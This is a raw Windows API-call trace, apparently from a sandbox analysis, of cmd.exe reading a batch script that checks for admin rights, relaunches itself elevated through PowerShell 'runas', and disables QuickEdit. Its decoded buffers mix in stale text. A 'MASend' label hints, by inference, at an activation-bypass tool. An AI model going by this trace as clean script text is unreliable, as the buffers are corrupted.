hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0176.447] _get_osfhandle (_FileHandle=3) returned 0xac [0176.447] GetFileType (hFile=0xac) returned 0x1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0176.447] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=5242, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0176.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n") returned 3 [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] GetFileType (hFile=0xac) returned 0x1 [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147a [0176.448] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=5244, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0176.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] GetFileType (hFile=0xac) returned 0x1 [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x147c [0176.448] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=5384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0176.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.448] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0176.448] _get_osfhandle (_FileHandle=3) returned 0xac [0176.448] GetFileType (hFile=0xac) returned 0x1 [0176.448] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1508 [0176.449] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=5386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0176.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.449] GetFileType (hFile=0xac) returned 0x1 [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x150a [0176.449] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=5454, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0176.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Elevate script as admin and pass arguments and preventing loop\r\n", cbMultiByte=68, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: Elevate script as admin and pass arguments and preventing loop\r\n======================================================================\r\n") returned 68 [0176.449] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.449] GetFileType (hFile=0xac) returned 0x1 [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x154e [0176.449] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=5456, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0176.449] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n Elevate script as admin and pass arguments and preventing loop\r\n") returned 2 [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.449] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0176.449] _get_osfhandle (_FileHandle=3) returned 0xac [0176.450] GetFileType (hFile=0xac) returned 0x1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1550 [0176.450] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=5475, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0176.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nul1% fltmc || (\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%nul1% fltmc || (\r\nas admin and pass arguments and preventing loop\r\n") returned 19 [0176.450] _get_osfhandle (_FileHandle=3) returned 0xac [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0176.450] _get_osfhandle (_FileHandle=3) returned 0xac [0176.450] GetFileType (hFile=0xac) returned 0x1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1563 [0176.450] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=5570, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0176.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not defined _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n", cbMultiByte=95, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not defined _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n===========================================\r\n") returned 95 [0176.450] _get_osfhandle (_FileHandle=3) returned 0xac [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0176.450] _get_osfhandle (_FileHandle=3) returned 0xac [0176.450] GetFileType (hFile=0xac) returned 0x1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15c2 [0176.450] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.450] SetFilePointer (in: hFile=0xac, lDistanceToMove=5581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0176.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%nceline%\r\nned _elev %psc% \"start cmd.exe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n") returned 11 [0176.450] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0176.451] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] GetFileType (hFile=0xac) returned 0x1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15cd [0176.451] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=5619, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0176.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo This script needs admin rights.\r\n", cbMultiByte=38, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo This script needs admin rights.\r\nexe -arg '/c \\\"!_PSarg:'=''!\\\"' -verb runas\" && exit /b\r\n") returned 38 [0176.451] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0176.451] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] GetFileType (hFile=0xac) returned 0x1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15f3 [0176.451] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=5697, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0176.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo To do so, right click on this script and select 'Run as administrator'.\r\n", cbMultiByte=78, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo To do so, right click on this script and select 'Run as administrator'.\r\nnas\" && exit /b\r\n") returned 78 [0176.451] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0176.451] _get_osfhandle (_FileHandle=3) returned 0xac [0176.451] GetFileType (hFile=0xac) returned 0x1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1641 [0176.451] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.451] SetFilePointer (in: hFile=0xac, lDistanceToMove=5710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0176.451] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto MASend\r\n, right click on this script and select 'Run as administrator'.\r\n") returned 13 [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] GetFileType (hFile=0xac) returned 0x1 [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x164e [0176.452] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=5713, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0176.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no MASend\r\n") returned 3 [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] GetFileType (hFile=0xac) returned 0x1 [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1651 [0176.452] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=5715, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0176.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0176.452] _get_osfhandle (_FileHandle=3) returned 0xac [0176.452] GetFileType (hFile=0xac) returned 0x1 [0176.452] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1653 [0176.452] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=5782, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0176.453] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\n", cbMultiByte=67, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\nstrator'.\r\n") returned 67 [0176.453] _get_osfhandle (_FileHandle=3) returned 0xac [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0176.453] _get_osfhandle (_FileHandle=3) returned 0xac [0176.453] GetFileType (hFile=0xac) returned 0x1 [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1696 [0176.453] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=5784, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0176.453] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n not exist \"%SystemRoot%\\Temp\\\" mkdir \"%SystemRoot%\\Temp\" %nul%\r\n") returned 2 [0176.453] _get_osfhandle (_FileHandle=3) returned 0xac [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0176.453] _get_osfhandle (_FileHandle=3) returned 0xac [0176.453] GetFileType (hFile=0xac) returned 0x1 [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1698 [0176.453] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.453] SetFilePointer (in: hFile=0xac, lDistanceToMove=5924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0176.453] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.453] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] GetFileType (hFile=0xac) returned 0x1 [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1724 [0176.454] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=5926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0176.454] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] GetFileType (hFile=0xac) returned 0x1 [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1726 [0176.454] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=6039, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0176.454] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: This code disables QuickEdit for this cmd.exe session only without making permanent changes to the registry\r\n", cbMultiByte=113, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: This code disables QuickEdit for this cmd.exe session only without making permanent changes to the registry\r\n=========================\r\n") returned 113 [0176.454] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0176.454] _get_osfhandle (_FileHandle=3) returned 0xac [0176.454] GetFileType (hFile=0xac) returned 0x1 [0176.454] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1797 [0176.455] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=6178, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0176.455] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n", cbMultiByte=139, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":: It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n\n") returned 139 [0176.455] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.455] _get_osfhandle (_FileHandle=3) returned 0xac [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0176.455] _get_osfhandle (_FileHandle=3) returned 0xac [0176.455] GetFileType (hFile=0xac) returned 0x1 [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1822 [0176.455] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=6180, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0176.455] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n It is added because clicking on the script window pauses the operation and leads to the confusion that script stopped due to an error\r\n") returned 2 [0176.455] _get_osfhandle (_FileHandle=3) returned 0xac [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0176.455] _get_osfhandle (_FileHandle=3) returned 0xac [0176.455] GetFileType (hFile=0xac) returned 0x1 [0176.455] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1824 [0176.455] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, 